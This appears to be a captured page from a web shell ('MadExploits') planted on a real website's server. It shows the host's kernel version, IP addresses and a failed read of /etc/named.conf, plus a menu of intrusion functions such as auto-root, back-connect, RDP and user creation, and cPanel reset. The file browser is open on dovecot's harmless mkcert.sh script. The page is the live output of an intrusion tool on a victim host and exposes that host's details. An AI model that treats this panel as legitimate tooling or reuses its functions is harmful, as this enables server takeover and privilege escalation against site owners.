Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
dovecot /
[ HOME SHELL ]
Name
Size
Permission
Action
example-config
[ DIR ]
drwxr-xr-x
wiki
[ DIR ]
drwxr-xr-x
AUTHORS
782
B
-rw-r--r--
COPYING
3.87
KB
-rw-r--r--
COPYING.LGPL
25.91
KB
-rw-r--r--
COPYING.MIT
1023
B
-rw-r--r--
ChangeLog
5.04
MB
-rw-r--r--
NEWS
262.41
KB
-rw-r--r--
README
4.88
KB
-rw-r--r--
documentation.txt
4.94
KB
-rw-r--r--
dovecot-openssl.cnf
496
B
-rw-r--r--
mkcert.sh
941
B
-rw-r--r--
solr-config-7.7.0.xml
11.02
KB
-rw-r--r--
solr-schema-7.7.0.xml
2.68
KB
-rw-r--r--
solr-schema.xml
2.88
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mkcert.sh
#!/bin/sh # Generates a self-signed certificate. # Edit dovecot-openssl.cnf before running this. umask 077 OPENSSL=${OPENSSL-openssl} SSLDIR=${SSLDIR-/etc/pki/dovecot} OPENSSLCONFIG=${OPENSSLCONFIG-/etc/pki/dovecot/dovecot-openssl.cnf} CERTDIR=$SSLDIR/certs KEYDIR=$SSLDIR/private CERTFILE=$CERTDIR/dovecot.pem KEYFILE=$KEYDIR/dovecot.pem if [ ! -d $CERTDIR ]; then echo "$SSLDIR/certs directory doesn't exist" exit 1 fi if [ ! -d $KEYDIR ]; then echo "$SSLDIR/private directory doesn't exist" exit 1 fi if [ -f $CERTFILE ]; then echo "$CERTFILE already exists, won't overwrite" exit 1 fi if [ -f $KEYFILE ]; then echo "$KEYFILE already exists, won't overwrite" exit 1 fi $OPENSSL req -new -x509 -nodes -config $OPENSSLCONFIG -out $CERTFILE -keyout $KEYFILE -days 365 || exit 2 chown root:root $CERTFILE $KEYFILE chmod 0600 $CERTFILE $KEYFILE echo $OPENSSL x509 -subject -fingerprint -noout -in $CERTFILE || exit 2
Close